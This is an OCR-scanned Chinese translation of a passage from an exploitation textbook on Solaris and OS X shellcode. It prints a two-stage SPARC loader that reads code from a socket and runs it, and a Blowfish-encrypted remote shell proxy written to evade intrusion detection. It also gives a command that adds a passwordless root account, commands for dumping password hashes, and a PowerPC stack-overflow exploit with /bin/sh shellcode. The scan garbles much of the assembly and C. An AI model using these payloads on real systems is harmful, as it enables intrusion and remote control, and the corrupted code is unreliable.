_dlopen () 实现 创新 的 时 候 了 ， 比 如 用 blowfish 加 密 通 信 信 道 ， 或 者 在 shellcode 内 利用 libpcap 
gir ZS ite 

我 们 将 用 二 段 式 的 shellcode 完 成 上 述 目标 。 第 一 段 shellocde 利 用 经 典 的 技巧 ， 为 第 二 阶段 的 
shellcode 设 置 执 行 环境 。 这 个 最 初 的 shellcode 分 三 个 阶段 进行 工作 :首先 ， 使 用 系统 调用 为 第 二 
阶段 的 shellcode 设 置 新 的 匿名 内 存 映 象 ， 然 后 ， 把 第 二 段 shellocde 读 入 新 的 内 存 区 域 ， 最 后 ， 刷 
新 新 区 域 上 的 指令 缓存 (为 了 安全 起 见 )， 并 以 跳 向 它 而 结束 。 辣 样 ， 在 跳 转 之 前 ， 我 们 应 该 注 
意 到 第 二 段 shellcode 期 望 网 络 套 接 字 的 编号 能 保存 在 si1， 因 此 ， 在 跳 转 前 需要 先 设置 它 。 下 面 
是 用 汇编 和 伪 代 码 形式 表示 的 第 一 段 shellcode: 


/* assuming "sock" will be the network socket number. whether hardcoded 
or found by getpeername() tricks */ 


/* grab an anonymous memory region with the mmap system call */ 
map - mmap(0, 0x8000, PROT READ|PROT WRITE|PROT EXEC, 

MAP ANON|MAP SHARED, -1, 

0); 


/* read in the second-stage shellcode from the network socket */ 
len = read(sock, map, 0x8000); 


/* go over the mapped region len times and flush the instruction cache */ 
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for(i = 0; i « len; i+=4, map += 4) 
iflush map; 


/* get the socket number in $il register and jump to the newly mapped region */ 
.asm ("mov sock, $il1"); 


f = (void (*)()) map; 
f(sock); 
现在 ， 把 上 面 的 伪 代 码 转换 成 SPARC 汇 编 。 
.align 4 
.global main 
.type main, #function 
.proc 04 
main: 
! mmap(0, 0x8000, PROT READ|PROT WRITE|PROT EXEC, MAP ANON|MAP SHARED, - 1,0); 
xor $11, $11, $00 1 $00 = 0 
mov 8, %11 
sil $11, 12, $01 ! $o1 = 0x8000 
mov 7, %02 ! $02 = 7 
sll $11, 28, $03 
or %03, 0x101, $03 ! %03 = 257 
mov -1, %o4 1 $04 = -1 
xor $11, %11, $05 ! $05 = 0 
mov 115, %g1 ! SYS mmap 115 
ta 8 ! mmap 
xor %12, %12, %11 ! %11 = 0 
add %11, %00, $g2 ! addr of new map 
! store the address of the new memory region in $g2 
! len = read(sock, map, 0x8000); 
! socket number can be hardcoded, or use getpeername tricks 
add %il, $11, %00 ! sock number assumed to be in %il 
add $11, $g2, %ol ! address of the new memory region 
mov 8, $11 
sll $11, 12, %02 ! bytes to read 0x8000 
mov 3, %gi 1 SYS read 3 
ta 8 ! trap to system call 
mov -8, $12 
add $g2, 8, %11 
loop: 
flush %11 - 8 ! flush the instruction cache 
cmp $12, $00 ! $00 = number of bytes read 
ble,a loop ! loop $00 / 4 times 


add $12, 4, $12 ! increment the counter 
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jump: 


!socket number is already in $i1 

sub $g2, 8, %g2 

jmp $g2 + 8 ! jump to the maped region 

xor $14, $15, %11 ! delay slot 

ta 3 ! debug trap, should never be reached ... 


如 果 用 /usr/bin/truss 跟 踪 ， _ 最 初 的 shellcode 将 产生 如 下 输出 : 


mmap(0x00000000, 32768, PROT READ|PROT WRITE|PROT EXEC, 
MAP SHARED|MAP ANON, -1, 


0) 


- OxFF380000 


read(0, OxFF380000, 32768) (sleeping... 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 

read(0, "aaaaaaaaa aa a"'.., 32768) = 43 
Incurred fault 46, FLTBOUNDS  $pc - Ox84BD8584 
siginfo: SIGSEGV SEGV MAPERR addr-0x84BD8584 
Received signal #11, SIGSEGV [default] 

siginfo: SIGSEGV SEGV, MAPERR addr-0x84BD8584 


*** process killed *** 


可 见 , 我 们 成 功 地 将 一 个 匿名 内 存 区 域 (0x££380000) Alread() 从 stdin 映 射 入 了 a 字符 串 并 
跳 向 它 。 执 行 终于 停 下 来 了 ， 我 们 得 到 sIGsSEGV〔 段 故障 )， 因 为 一 行 0x61 字 符 其 实 并 没什么 意义 。 

现在 将 为 第 二 段 shellcode 收 集 各 种 信息 ， 并 以 此 来 结束 本 节 的 学 习 。 第 二 段 shellcode 的 步 进 
式 执 行 流 后 面 是 带 有 汇编 和 C 组 件 的 shellcode 本 身 。 看 一 下 伪 代 码 ， 这 样 你 就 能 更 好 地 理解 正在 
发 生 什 么 了 。 


open() /usr/lib/ld.so.1 (dynamic linker). 

mmap() ld.so.1 into memory (once again). 

locate _dlsym in newly mapped region of ld.so.1 

search .dynsym, using .dynstr (dynamic symbol and string tables) 

locate and return the address for  dlsym() function 

using _dlsym() locate dlopen, fread, popen, fclose, memset, strlen ... 

dlopen() /usr/local/ssl/lib/libcrypto.so (this library comes with openssl) 
locate BF set key() and BF cfb64 encrypt() from the loaded object (libcrypto.so) 
Set the blowfish encryption key (BF set key()) 

enter a proxy loop (infinite loop that reads and writes to the network socket) 


代理 循环 的 伪 代 码 如 下 : 


read() from the network socket (client sends encrypted data) 
decrypt whatever the exploit send over. (using BF cfb64 encrypt() with 


DECRYPT flag) 


popení() pipe the decrypted data to the shell 

fread() the output from the shell (this is the result of the piped command) 
do an strlení() on the output from popení() (to calculate its size) 
encrypt the output with the key (using BF cf£b64 encrypt() with ENCRYPT flag) 
write() it to the socket (exploit side now needs to decrypt the response) 
memset() input and output buffers to NULL 

fclose() the pipe 

jump to the read() from socket and wait for new commands 
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下 面 是 真正 的 代码 。 

T---------- BF shell.s -------------------------.-.--- e. c--- 
.Section "text" 
.align 4 
.global main 
. type main, #function 
.proc 04 

main: 
call next 
nop 





fuse $11 for SOCK 


next: 


add 


add 
mov 
mov 
ta 


mov 


mov 
sethi 
mov 
ta 


mov 
mov 


$07, 0x368, $i2 


$i2, 40, $00 
0, %ol 
5, %g1 


$hi (16384000), 
1, %02 
2, %03 


thi (0x80000000), 


%g1, %03, $03 
0, %05 


115, %g1 


$15 
$15 

64, 
find_sym 


Sol 


$15, %i2 


%00, %i3 

%i5, %00 
$h1(16384000), 

117, %gl 


$ol 


Sol 


!functable addr 


ILDSO string 


!SYS open 


!fd 
Ifd 
INULL 
{size 
!PROT_READ 
!MAP PRIVATE 
$gl 


loffset 
ISYS mmap 


!need to store functable to temp reg 


laddr from mmap() 


!" dlsym" string 


!restore functable 


!location of _dlsym in ld.so.1 


laddr 
!Isize 
!SYS munmap 


!fd 
ISYS close 
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ta 8 
sethi Shi(0Oxff3b0000), %00 !O0xf£3b0000 is ld.so base in every process 
add $13, %00, $13 laddress of  dlsym() 
st $13, [ $12 + 0 ] !store dlsym() in functable 
mov -2, $00 
add $i2, 72, Sol !" dlopen" string 
call $i3 
nop 
st $00, [%i2 + 4] !store _dlopen() in functable 
mov -2, %00 
add $12, 80, %ol !" popen" string 
call $i3 
nop 
st $00, [$12 + 8] {store _popen() in functable 
mov -2, %o0 
add $12, 88, %ol I"fread" string 
call $13 
nop 
st $00, [$12 + 12] !store fread() in functable 
mov -2, %o0 
add $i2, 96, $o1 !"fclose" string 
call %i3 
nop 
st %00, [i2 + 16] Istore fclose() in functable 
mov -2, $00 
add $12, 104, %ol !"strlen" string 
call %i3 
nop 
st %00, [$12 + 20] lstore strlen() in functable 
mov -2, %00 
add $12, 112, $01 ! "memset" string 
call %13 
nop 
st %o0, [i2 + 24] !store memset () in functable 
1d {%i2 + 4], %02 ! dlopen() 
add $12, 120, %00 
!"/usr/local/ssl/lib/libcrypto.so" string 
mov 257, %01 !IRTLD GLOBAL | RTLD_LAZY 
call $02 


nop 
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mov -2, $00 
add $12, 152, $01 I"BF get key" string 
call $13 
nop 
st *$o0, [%12 + 28] !store BF set key() in functable 
mov -2, $00 
add $12, 168, *o1 !"BF cfb64 encrypt" string 
call %i3 !call _dlsym() 
nop 
st $00, [%i12 + 32] !store BF cfb64 encrypt() in functable 
IBF set key(&BF KEY, 64, &KEY); 
!this API overwrites %g2 and %g3 
Itake care! 
add $i2, Oxc8, $02 ! KEY 
mov 64, %ol ! 64 
add $12, 0x110, $00 ! BF KEY 
ld [$i2 + 28], %03 ! BF set key() pointer 
call $03 
nop 
while loop: 
mov Sil, $00 ! SOCKET 
sethi hi (8192), $02 
lreserve some space 
sethi $hi(0x2000), %11 
add $12, $11, %14 ! somewhere after BF KEY 
mov $i4, $o1 ! read buffer in %i4 
mov 3, %g1 ! SYS, read 
ta 8 
cmp %o0, -1 Ilen returned from read() 
bne proxy 
nop 
b error out !-1 returned exit process 
nop 
proxy: 
!BF cfb64 encrypt(in, out, strlen(in), &key, ivec, &num, enc); 
DECRYPT 
mov %00, $02 ! length of in 
mov $14, &o0 ! in 
sethi $hi(0x2060), %11 
add $14, %11, $i5 Iduplicate of out 
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add $i4, $11, $01 ! out 
add $12, 0x110, $03 ! key 
sub $01, 0x40, %04 ! ivec 
st $gO0, [$04] ! ivec = 0 
sub $01, 0x8, %05 ! &num 
st $gO, [$05] ! num = 0 
!hmm stack stuff..... put enc [%sp + XX] 
st %g0, [%sp+92] !BF_DECRYPT 0 
ld [$12 + 32], %11 ! BF cfb64 encrypt() pointer 
call $11 
nop 
mov %i5, %00 ! read buffer 
add $12, 192, $o1 ! "rw" string 
ld [$12 + 8], $02 ! |popen() pointer 
call $02 
nop 
mov $00, %13 ! store FILE *fp 
mov $i4, %o00 ! buf 
sethi $hi(8192), %01 ! 8192 
mov 1, $02 1 
mov $i3, %03 ! fp 
id [$12 + 12], $o4 ! fread() pointer 
call $04 
nop 
mov $i4, %o0 !bu£f 
ld [$12 + 20], %ol Istrlen() pointer 
call ol, 0 | 
nop 
!IBF cfb64 encrypt(in, out, strlen(in), &key, ivec, &num, enc); 
ENCRYPT . 
mov %00, $02 ! length of in 
mov $i4, %00 ! in 
mov $02, %i0 ! store length for write(.., len) 
mov $i5, £o1 ! out 
add $i2, 0x110, %03 ! key 
sub %$i5, 0x40, %o04 ! ivec 
st %g0, [$04] ! ivec = 0 
sub $i5, 0x8, $05 ! &num 
st $gO, [$05] ! num = 0 
thmm stack shit..... put enc [$sp + 92] 
mov 1, %11 
st $11, [%sp+92] ! BF ENCRYPT 1 
la [$12 + 32], %11 ! BF_cfb64_encrypt() pointer 


call %11 
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nop 
mov %10, $02 llen to write() 
mov %i1, $00 ! SOCKET 

mov %i5, tol ! buf 

mov 4, %g1 1SYS write 

ta 8 

mov $14, %o0 l! buf 

mov 0, %ol 10x00 

sethi $hi(8192), $02 

or %02, 8, %o2 18192 

ld [$12 + 24], $03 !memset() pointer 
call %03, 0 

nop 

mov $i3, $00 

ld [$12 + 16], $01 !fclose() pointer 
call ol, 0 

nop 

b while loop 

nop 


error out: 


mov 0, %00 
mov 1, %g1 !SYS exit 
ta 


! following assembly code is extracted from the -fPIC (position independent) 


! compiled version of the C code presented in this section. 
1 refer to find sym.c for explanation of the following assembly routine. 


find sym: 
1d [$00 + 32], %g3 
cir %o2 
lduh [$00 + 48], %g2 
add $00, %g3, %g3 
ba fi 
cmp $02, %g2 
f3: 
add $02, 1, %o2 
cmp $02, %g2 
add %g3, 40, %g3 
fi: 
bge £2 
sll $05, 2, %g2 
la [%g3 + 4], %g2 
cmp %g2, 11 
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lduh [$00 + 48], $g2 
id [$93 + 24], $05 
ld [$93 + 12], $03 
sil $o5, 2, $g2 
f2: 
la [$00 + 32], %g3 
add %g2, %05, $g2 
sll $g2, 3, %g2 
add $00, %g3, $g3 
add $9g3, %g2, $g3 
ld [%g3 + 12], %05 
and $00, -4, %g2 
add $03, $g2, %o4 
add $05, %g2, %05 
f5: 
add $04, 16, %04 
f4: 
ldub [$04 + 12], $g2 
and $g2, 15, %g2 
cmp $g2, 2 
bne,a f4 
add $04, 16, $04 
ld [$04], %g2 
mov $01, %02 
ldsb [$02], $93 
add $05, %g2, %03 
ldsb [$05 + %g2], %00 
cmp $00, Sg3 
bne £5 
add $02, 1, $02 
ldsb [%03], $g2 
£7: 
cmp $g2, 0 
be f6 
add $03, 1, $03 
ldsb [$02], $g3 
ldsb [$03], %g2 
cmp %g2, $g3 _ 
be £7 
add $02, 1, %02 
ba f4 
add $04, 16, $04 
£6: 
jmp $07 + 8 
id [$04 + 4], $00 
functable: 
.word OxbabebabO ! dlsym 
.word Oxbabebab1 ! dlopen 
.word Oxbabebab2 ! popen 


-word Oxbabebab3 !fread 
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.word Oxbabebab4 !fclose 

.word Oxbabebab5 istrien 

.word Oxbabebab6 . !memset 

.word Oxbabebab7 !IBF set key 

.word Oxbabebab8 IBF c£fb64 encrypt 


.word Oxffffftfff 





LDSO: 
.asciz  "/usr/lib/1d.so.1" 
.align 8 
DLSYM: 
.asciz  " dlsym" 
.align 8 
DLOPEN: 
.asciz ^" dlopen" 
.align 8 
POPEN: 
.asciz  " popen" 
.align 8 
FREAD: 
.asciz "fread" 
.align 8 
FCLOSE: 
.asciz "fclose" 
.align 8 
STRLEN: 
.asciz "strlen" 
.align 8 
MEMSET: 
.agciz "memset" 
.align 8 
LIBCRYPTO: 
.asciz  "/usr/local/ssl/lib/libcrypto.so" 
.align 8 
BFSETKEY: 
.asciz "BF set key" 
-align 8 
BFENCRYPT: 
-asciz "BF_cfb64_encrypt" 
.align 8 
RW: 
.asciz "rw" 
.align 8 
KEY: 
.asciz 
"6fald67f32d67d25a316ee78e487507224ddcc968743a9cb81c912a78ae0a0ea9" 
.align 8 
BF KEY: 


.asciz "12341234" !BF KEY storage, actually its way larger 
.align 8 
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像 在 shellcode 注 释 里 提 到 的 那样 ，fina_sym() 是 一 个 简单 的 C 例 程 ， 它 为 我 们 分 析 动 态 链接 
程序 区 段 头 部 ， 查 找 动态 符号 表 和 字符 串 表 。 其 次 ， 它 通过 分 析 动 态 符号 表 里 的 入 口 ， 并 把 请 求 
的 函数 名 和 字符 串 表 里 的 字符 串 做 比较 ， 试 图 找 出 请 求 的 函数 。 


--------------- find sym.e ---------------------------------------- 
#include <stdio.h> 

#include «dlfcn.h» 

#include <sys/types.h> 

#include <sys/elf.h> 

#include <fcntl.h> 

#include <sys/mman.h> 

#include <libelf.h> 


u_long find_sym(char *, char *); 


u_long 
find_sym(char *base, char *buzzt) 
{ 
El1f32 Ehdr *ehdr; 
El1f32 Shdr *shdr; 
El1f32 Word *dynsym, *dynstr; 
ELlf32 Sym  *sym; 
const char *s1, *s2; 
register int i - 0; 


ehdr (Elf32 Ehdr *) base; 


i 


shdr (ELf32 Shdr *) ((char *)base + (El1f32, Off) ehdr-»e shoff]; 


/* look for .dynsym */ 


while( i « ehdr->e_shnum) { 
if(shdr-»sh type == SHT DYNSYM)( 
dynsym = (Elf32 Word *) shdr-»sh addr; 


dynstr = (E1f32 Word *) shdr-»sh link; 

//offset to the dynamic string table's section 
header 

break; 


shdr++, i++; 


shdr = (EIf32 Shdr *) (base + ehdr->e_shoff); 
/* this section header represents the dynamic string table */ 
shdr += (Elf32 Word) dynstr; 
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dynstr = (E1£32_Addr *) shdr->sh_addr; /*relative location of .dynstr*/ 
dynstr += (E1£32_Word) base / sizeof(Elf32 Word); /* relative to virtual */ 


dynsym += (El1f32 Word) base / sizeof(Elf32 Word); /* relative to virtual */ 


sym = (Elf32 Sym *) dynsym; 
while(1) ( 


/* first entry is in symbol table is always empty, pass it */ 
sym++; /* next entry in symbol table */ 


if(ELF32 ST TYPE(sym-»st info) != STT FUNC) 
continue; 
sl = (char *) ((char *) dynstr + sym-»st name); 
s2 = buzzt; 
while (*s1 == *s2++) 
if (*s1++ == 0) 


return sym->st_value; 


11.4 h 


在 本 章 , 我 们 通过 单 步 执 行动 态 链接 程序 , 介绍 了 利用 Solaris 漏 洞 的 第 一 个 真正 可 靠 的 方法 。 
另外 ， 我 们 还 介绍 了 加 密 的 blowfish shellcode， 利 用 它 可 以 战胜 各 种 网 络 IDS 或 IPS 。 





OS X shellcode 






ee 





M acintosh 《尤其 是 OS X) 的 安全 性 被 大 肆 宣 传 成 超出 PC， 如 下 面 两 段 引文 所 述 。 
Mac OS X 遵 循 行业 标准 ， 具 有 开放 式 的 软件 开发 方式 ， 同 时 采用 合理 的 架构 体系 ， 为 
用 户 提供 了 最 高 等 级 的 安全 保证 。 这 种 智能 设计 有 效 抵御 了 目前 正 折 磨 PC 的 成 群 的 病毒 和 间谍 
软件 。( 摘自 http:/www.apple.com/macosx/features/security/。) 
Mac OS X 正 是 为 了 高 安全 性 而 设计 的 ， 因 此 ， 它 不 会 像 PC 那 样 再 唱 受 病毒 和 恶意 软件 的 持 
续 攻 击 。( 摘自 http://www.apple.com/getamac/。 ) 


虽然 这 些 只 是 宣传 广告 ， 其 真实 性 有 待 商 梭 ， 但 苹果 公司 简化 OS X 默 认 安装 方式 ， 在 安全 方 
面 做 了 有 益 的 改进 ， 这 些 都 是 有 目 共 睹 的 。 然 而 ， 到 本 书 截稿 时 ， 它 在 利用 保护 机 制 、 汇 露 不 可 
执行 堆 、 栈 cookie 和 ASLR (Address Space Layout Randomization, Windows Vista 默 认 启用 这 个 特性 ， 
在 一 些 常 见 的 Linux 发 行 版 中 也 可 以 看 到 它 的 身影 ) 等 方面 落后 于 Windows 和 Linux 也 是 事实 。 

本 章 介绍 的 内 容 包 括 苹果 公司 OS X 操 作 系统 的 基本 信息 、OS X 上 PowerPC 和 Intel shellcode 
的 基础 知识 以 及 在 OS X 上 寻找 并 利用 bug 时 需要 留心 的 一 些 问 题 。 


12.1 OSX 就 是 BSD 吗 


当然 不 是 , 或 者 说 不 全 是 。 我 们 可 以 把 OS X 想 象 成 集 多 种 操作 系统 优点 于 一 身 的 “混血 儿 ”。 
就 像 英 语 是 许多 优秀 语言 (其 中 一 些 语 言 已 经 消亡 很 久 了 ) 的 结合 体 一 样 ，OS X 是 多 种 优秀 技 
术 的 结合 体 ， 这 些 技术 中 的 一 些 已 经 不 常用 了 ， 也 有 一 些 是 全 新 的 。 

OSX 和 老 版 本 的 Mac OS 有 一 些 关 联 。 它 们 的 内 核 都 是 基于 Mach 和 BSD 的 ， 如 果 追 溯 它 的 起 
源 ， 可 以 发 现 自 20 世 纪 80 年 代 晚期 到 1997 年 苹果 公司 收购 NeXT 为 止 ， 它 一 直 都 是 NEXTSTEP 的 
内 核实 现 。 OS X 在 1999 年 作为 Mac OSXv10.0 正 式 对 外 发 布 , 到 本 书 截 稿 时 , 它 的 版 本 是 v10.4.9。 
尽管 苹果 公司 在 2005 年 6 月 宣布 ， 它 将 在 2007 年 年 底 之 前 把 所 有 新 Mac 都 转移 到 Intel 平 台 上 ， 但 
OS X 现 在 仍 可 以 在 PowerPC 和 Intel 处 理 器 上 运行 。 

除了 其 独特 的 “Aqua”UI 主 题 外 ，OS X 确 实 有 一 些 UNIX 的 感觉 ， 这 主要 由 于 它 的 大 部 分 组 
成 都 来 自 于 一 些 开源 项 目 。 在 安全 防护 方面 ， OS X 稍 微 落 后 于 Windows 和 Linux。 它 没有 栈 cookie 
保护 ， 没 有 栈 或 堆 随 机 化 ， 也 没有 堆 保护 〈 尽 管 堆 实现 有 点 与 众 不 同 ， 但 人 们 对 它 对 安全 的 好 处 
还 有 一 定 争 议 )。OS X 操 作 系 统 有 内 置 的 防火 墙 、 所 有 常见 的 日 志 、 密 码 保护 等 。 
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虽然 OS X 支 持 很 多 种 第 三 方 文件 系统 ， 但 它 首选 的 文件 系统 是 HFS+《〈 它 是 苹果 公司 自己 的 
日 志 式 文件 系统 )。 


122 OS X 是 否 开源 


可 以 说 它 在 一 定 程度 上 是 开源 的 ， 在 http:/www.opensource.apple.com/darwinsource/ 上 可 以 找 
到 OS X (“Darwin”) 的 内 核 源 代码 。 

这 些 源 代 码 包 含 了 xnu《〈 它 是 MachMBSD 的 内 核 ) 以 及 大 量 的 用 户 模 式 组 件 ， 其 中 有 些 是 苹 
果 公 司 开发 的 ， 而 另外 的 则 是 外 部 的 开源 项 目 所 做 的 。 这 些 代码 在 编译 后 ， 基 本 就 可 以 组 成 一 个 
操作 系统 了 。 

也 就 是 说 ， 人 们 对 区 果 公 司 的 开源 凭证 有 一 些 异议 。 在 写作 本 书 的 时 候 ，OpenDarwin 项 目 
(http:/www.opendarwin.org/) 已 经 停止 了 ， 在 结束 这 个 项 目的 理由 中 ， 有 一 个 就 提 到 了 “源码 的 
可 用 性 差 ， 与 苹果 公司 所 倡导 的 交互 性 不 符 ， 难 以 编译 及 跟踪 源码 ， 开 发 团队 对 此 缺乏 兴趣 ” 

另 一 个 引 人 注 目的 与 OS X 有 关系 的 开源 项 目 是 GNU-Darwin， 它 想 在 一 定 范围 内 把 Darwin 的 
能 力 与 GNU 社 团 的 活力 结合 起 来 。 

如 果 你 准备 编译 Darwin, 强烈 推荐 你 了 解 一 下 DarwinBuild 项 目 。 可 以 在 http://trac.macosforge. 
org/projects/darwinbuild/ 上 找到 该 项 目 。 

男 一 个 与 Mac 有 关 的 开源 网 站 是 MacForge (http://www.macforge.net/)， 它 提供 了 可 以 在 Mac 
上 工作 的 开源 项 目 索引 。 


12.3 UNIX 支持 的 OS X 


对 用 惯 了 Linux 的 人 来 说 ， 初 次 使 用 OS X 时 可 能 会 感到 比较 迷 避 。UNIX 老 用 户 脑海 中 冒 出 
来 的 第 一 个 问题 是 ,“ 那 些 东 西 都 躲 哪 去 了 ? ” 
我 们 先 看 一 下 文件 系统 的 布局 。 





Linux OS X 

fetc/init.d/ /Library/StartupItems 
或 
/System/Library/Startupltems 

/home/ /Users/ 

/mnt/ /Volumes/ 

<core dumps> /cores/ 

/proc/<pid>/maps vmmap 工具 


关于 OS 义 有 一 点 很 重要 ， 一 些 重 要 的 系统 配置 (例如 与 /etc/password 和 /etc/shadow 类 
似 的 数据 ) 都 保存 在 一 个 分 级 的 被 称 为 NetInfo 的 数据 库 里 。 从 攻击 者 的 观点 来 看 , 这 有 一 些 暗示 。 
例如 ， 不 能 用 cat /etc/shadow 获 取 密 人 码 散 列 值 。 

对 那些 常见 的 “增加 新 账号 ”的 shellcode 来 说 ， 账 号 消息 保存 在 数据 库 里 会 使 它 更 复杂 ， 因 
为 你 必须 直接 用 Directory Services API 或 NetInfo 命 令 行 工 具 增 加 账号 。“B-r00t”(“Smashing The 
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Mac For Fun & Profit” 白 皮 书 的 作者 ) 通 过 运行 下 面 这 样 的 命令 行 来 增加 r00t 账 号 (注意 对 niload 
的 调用 ): 


/bin/echo 'r00t::999:80::0:0:r00t:/:/bin/sh'|/usr/bin/niload -m passwd . 


密码 破解 

很 明显 ，Netinfo 数 据 库 所 在 的 文件 肯定 被 保存 在 文件 系统 里 ， 可 以 直接 从 /privateyvar/ 
db/netinfo/ 中 读 取 ， 尽 管 这 需要 有 root 特 权 。 

10.2 及 以 前 版 本 的 OS XX 直接 用 DES 格 式 保存 密码 的 散 列 值 , 可 以 通过 直接 查询 NetInfo 找 回 散 
列 值 : 


Apple:/private/var/db/shadow/hash root# nidump passwd . 

nobody: *:-2:-2::0:0:Unprivileged User:/var/empty: /usr/bin/ false 

root: ********:0:0::0:0:System Administrator: /private/var/root:/bin/sh 
daemon: *:1:1::0:0:System Services: /var/root:/usr/bin/ false 


10.3 版 本 把 密码 的 散 列 值 以 “shadowed” 的 格式 保存 在 /var/abyshadow/hash 目 录 里 ， 把 散 
列 值 保存 在 以 GUID 作 为 文件 名 的 文件 里 。 运 行 下 面 这 样 的 命令 就 可 以 找到 users 对 应 的 GUID; 


nidump -r /users . 

在 10.3 版 本 里 ， 密 码 的 散 列 值 用 的 是 NT LanMan MD4 格 式 ， 并 且 在 尾部 增加 了 它 的 SHA1 散 
列 值 。10.4 版 本 里 的 散 列 文件 保存 在 同样 的 位 置 ( /var/qdb/shadow/hash)， 但 是 使 用 了 加 盐 值 
的 〈salted) SHA1 格 式 。 
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交待 这 些 背景 知识 后 ， 我 们 将 开门 见 山 ， 直 接 尝试 利用 栈 溢出 ， 观 察 Mac 上 的 PowerPC 
shellcode 和 Linux 里 的 Intel shellcode 有 何 异 同 ， 不 再 介绍 PowerPC 的 指令 集 了 。 

下 面 是 一 段 示例 代码 : 

// stack.c 

#include <stdio.h> 

#include <stdlib.h> 

#include <string.h> 

int main( int argc, chdr *argv[] ) 

{ 

char buff[ 16 ]; 


if( argc <= 1 } 
return printf("Error - param expected\n"); 


strepy( (char *)buff, argv[1] ); 


return 0; 
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同 在 Linux 上 做 的 一 样 ， 用 gcc 编 译 这 个 程序 : 

Apple:~/chapter_12 shellcoders$ cc stack.c -o stack 

分 别 用 一 个 短 的 和 一 个 长 的 字符 串 作为 参数 运行 它 : 

Apple:-/chapter 12 shellcoders$ ./stack AAAABBBB 

Apple:-/chapter 12 shellcoders$ ./stack AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH 


在 使 用 长 字符 串 之 后 ， 并 没有 看 到 它 有 崩溃 的 迹象 〈 在 Intel 处 理 器 上 ， 佑 计 这 么 长 的 字符 串 
可 能 会 导致 程序 骨 江 )。 尝 试 一 些 更 长 的 字符 串 : 

Apple:~/chapter_12 shellcoderss ./stack 

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLL 

Apple:-/chapter 12 shellcoders$ ./stack 

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP 

Segmentation fault 


看 一 下 正在 改写 的 保存 的 返回 地 址 : 


Apple:-/chapter 12 shellcoders$ gdb ./stack 

(gdb) set args 
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKRKLLILLMMMMNNNNOOOOPPPP 
(gdb) run 

Starting program: /Users/shellcoders/chapter 12/stack 
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJIKKKKLLLLMMMMNNNNOOOOPPPP 
Reading symbols for shared libraries . done 


Program received signal EXC, BAD ACCESS, Could not access memory. 
Reason: KERN INVALID ADDRESS at address: 0x4d4d4d4c 
Ox4d4d4d4c in ?? () 


看 似 非常 清楚 了 , 我 们 重 定向 了 执行 流 ， 尽 管 它 所 做 的 改写 比 我 们 熟悉 的 更 大 一 些 。 本 节 后 
面 会 解释 为 什么 会 这 样 ， 但 是 现在 ， 先 让 shelicode 运 行 起 来 吧 。 保 存 的 返回 地 址 0x4ad4d4d4c 训 
无 意义 。 在 我 们 关注 的 处 理 器 (PowerPC) 上 ， 指 令 的 长 度 是 32 位 ， 以 32 位 为 边界 对 齐 。 因 此 ， 
当 用 0x4q4q4q4d 改 号 保存 的 返回 地 址 时 ， 两 个 低位 被 忽略 了 ， 径 直 跳 到 0x494d4d4c。 

我 们 将 要 使 用 的 shellcode 来 自 B-r00t 于 2003 年 发 表 的 文章 “Smashing The Mac For Fun & 
Profit”《 见 http://packetstormsecurity.org/shellcode/PPC_OSX_Shellcode_Assembly.pdf)。 稍 后 再 解 
释 这 段 代码 是 怎样 工作 的 ， 现 在 直接 使 用 即 可 。 

除了 上 面 提 到 的 那些 东西 ， 我 们 还 需要 nop 滑 道 (sled)。 目 前 ， 我 们 只 需要 知道 指令 
0x7c631a79 等 价 于 nop, 也 就 是 说 , 它 在 代码 中 不 做 任何 实质 性 的 事情 。 因此 , 我 们 会 在 shellcode 
前 面 放 很 多 这 样 的 指令 。 

执行 流 是 ， 被 重 定向 到 MMMM 的 ， 运 行 下 面 的 命令 就 可 以 跳 转 到 任何 地 方 : 

./stack $(printf "%048x\x40\x40\x40\x40") 

也 就 是 说 ， 我 们 把 48 个 “0” 与 希望 跳 到 的 地 址 组 成 一 个 字符 串 ， 然 后 把 它 作为 命令 行 参数 传递 
了 。 用 printf 命 令 的 话 ， 这 个 工作 就 更 简单 了 ， 因 为 它 允 许 用 十 六 进 制 表示 地 址 。 如 果 想 创建 
nop 滑 道 ， 可 以 像 下 面 的 命令 那样 ， 重 复 执行 hop 指令 40 000 次 : 


for( (i=0;i<40000;i++)})do printf "\x7c\x63\xla\x79"; done; 
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注意 ， 在 这 里 有 一 点 与 Linux/Intel 的 机 器 不 一 样 ， 我 们 不 需要 反 转 字 节 序 ， 因 为 PowerPC 是 
big-endian. 
最 终 的 shellcode 如 下 所 示 ; 


printf 
"\x7c\x63\xla\x79\x40\x82\xf£\xfd\x39\x40\x01\x23\x38\x0a\xfe\xf£4\x44\xf 
£\xf£\x02\x60\x60\x60\x60\x7c\xa5\x2a\x79\x7C\x68\x02\xa6\x38\x63\x01\x5 
4\x38\x63\xfe\xf4\x90\x61\xf£\xf8\x90\xal\xff\xfo\x38\x81\xff\xf8\x3b\xe 
O\x01\%47\x38\xle\xfe\xf4\x44\xff\xf£\x02\x7c\xa3 \x2b\*7 8\x3b\xc0\x01\x0 
d\x38\xle\xfe\xf4\x44\xff£\xff£\x02\x2£\x62\x69\x6e\x2£\x73\x68" 


接 下 来 要 做 的 是 调试 这 个 程序 ， 猜 测 一 个 位 于 ncp 滑 道 范围 内 的 地 址 。 看 一 下 第 一 个 栈 帧 在 
进入 的 main() 处 的 什么 位 置 : 


Apple:-/chapter 12 shellcoders$ gdb ./stack 
(gdb) break main 
Breakpoint 1 at Ox2ad0 
(gdb) run 
Starting program: /Users/shellcoders/chapter 12/stack 
Reading symbols for shared libraries . done 


Breakpoint 1, 0x00002ad0 in main () 
(gdb) info frame 0 

Stack frame at Oxbffffa80: 

pc = 0x2ad0 in main; saved pc 0x2308 


与 Linux 不 同 ， 初 始 栈 帧 位 于 0xbfff<nnnn>。 
因为 正在 写 的 nop 滑 道 有 160 000B， 所 以 ， 可 以 假设 代码 所 处 的 地 址 比 oxbffffa80 要 稍微 低 
一 点 ， 就 当 作 是 从 0xbffa0404 开 始 吧 。 像 下 面 这 样 安排 命令 行 参数 : 


<padding> 

<saved return address> 
<nop sled> 

<shellcode> 


运行 结果 如 下 《保存 的 返回 地 址 用 粗 体 表示 ): 


Apple:-/chapter 12 shellcoders$ ./stack "$(printf 

